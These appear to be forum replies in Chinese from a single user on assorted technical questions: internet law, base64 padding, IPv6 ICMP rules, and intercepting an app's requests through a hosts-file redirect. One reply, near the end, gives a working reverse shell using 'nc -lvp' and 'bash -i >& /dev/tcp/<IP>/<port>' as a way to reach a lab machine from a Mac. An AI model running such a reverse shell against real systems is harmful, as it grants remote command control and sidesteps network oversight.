redis 被任意代码执行，挂了个挖矿脚本……

面对初级用户，也就抓抓包自己用着方便的，你也没必要去限制人家。
要是已经抓包然后转成一个可以对外开放使用的工程了，可以产生大量请求了，那已经不是初级用户了，你加密也限制不了的。

所以，明确了国际信道是指物理信道，而这个信道又是电信部门装的，你访问任何一台国外的机器都是合法的（除非另外有明确说哪些主机非法，也就是公开的黑名单，公开公平公正给出具体原因的那种），访问请求加密也是合法的，55 本质与 vpn 也不一样，所以……
人治 or 法治？

@holinhot
@vigack
你只看了 《中华人民共和国计算机信息网络国际联网管理暂行规定》，上面只有说建立非法定信道怎样怎样，实际上另外的说明在其配套的 1998-02-13 实施，现行有效的 《中华人民共和国计算机信息网络国际联网管理暂行规定实施办法》（后面多了实施办法四个字）
第三条，第三款，给出：（三）国际出入口信道，是指国际联网所使用的物理信道。

看起来如果仅仅是这个提示的话应该算是个安全提示，提前告知你将要跳转到其他网站，注意谨防钓鱼之类的，因为目标网站与当前网站无关，不要输入当前网站的账号密码之类的……
如果利益相关的话，估计就不会给你链接，直接封杀了……

@k9982874 也不是所有 base64 都是双等号结束啊……有单等号的，也有没等号的，看原始数据长度定的啊……
而且等号可以省略的啊……

既然你直接知道目标代码在 100 行左右，那为啥不花 10 分钟顺手就写出来呢？
不会写？为啥确定 100 行左右就能搞定呢？
即便真的就是几个公式而已，调试、测试也是很烧脑的。
确定不需要有点能力水平的程序员？普通人或者大学生可能刚接触编程不久的那种，即便是计算机学软件开发的，连个 if-else 逻辑都可能给绕进去，你确定可以吗？

我建议还是先说需求，让 v 站朋友先给看看工作量，然后再考虑找谁做、怎么做。

学会用 wireshark 有好处，fiddler、charles 这些 HTTP 抓包工具也挺好用。
当然，既然你都知道请求的 HOST 了，那就改 hosts，把那个域名指向 127.0.0.1，然后你本地写个 HTTP 服务监听 80/443 端口（ 443 端口证书自信任），然后自己的 HTTP 服务就可以拿到所有的请求地址和参数了。

咦？不是 8 号上班吗？ 32 小时后啊？

@miona 没听说啊，哪的消息？只有买了 Google Fi 的 GV 会被禁用吧？

天津移动，狗带

试试全局？

gephi ？

是不是把 icmpv6 的包全给 drop 掉了？ IPv6 地址的分配需要放行几个特定的 icmpv6 包（ nd-router-solicit, nd-router-advert, nd-neighbor-solicit, nd-neighbor-advert，我是开了这几个，但貌似不是全都需要的）

@635614874 反弹 shell 概念挺多，但其实就两条命令就行，Mac 上装个 nc 命令（ net cat，一般 Linux 都有，但是 Mac 默认没有）。
然后 Mac 上运行 nc -lvp 12345 （看具体 nc 版本，有些 l、p 参数不能同时存在的，直接 nc -lv 12345 ），这句话是在 Mac 上启一个 TCP 服务监听 12345 端口。
然后在实验室机器上运行 bash -i >& /dev/tcp/123.123.123.123/12345 0>&1 把里面的 123.123.123.123 改成你 Mac 的 IP，12345 是端口。
然后你 Mac 上就可以直接操作实验室机器了。
就装个 Map 没自带的 NetCat，就两条命令，不用任何配置文件，不需要中间跳板，不需要公网，只要两个设备其中一个能访问到另一个即可，比楼上各位都简单。随用随开，用完 ctrl+c 即可退出。

附我觉得对反弹 shell 讲的比较详细的原理文章：
https://xz.aliyun.com/t/2548
https://xz.aliyun.com/t/2549

@zjsxwc https 与域名无关，是要具体服务器上部署的服务做配置的，而解析到本地回环地址的话，服务就是要在本地搭，所以有没有 https 完全取决于你自己搭的服务，而与域名无关。

不知道怎么放图的话，就把输出的内容复制贴出来

实验室机器可以连到你的 Mac 吗？可以的话就反弹个 shell 出来就行了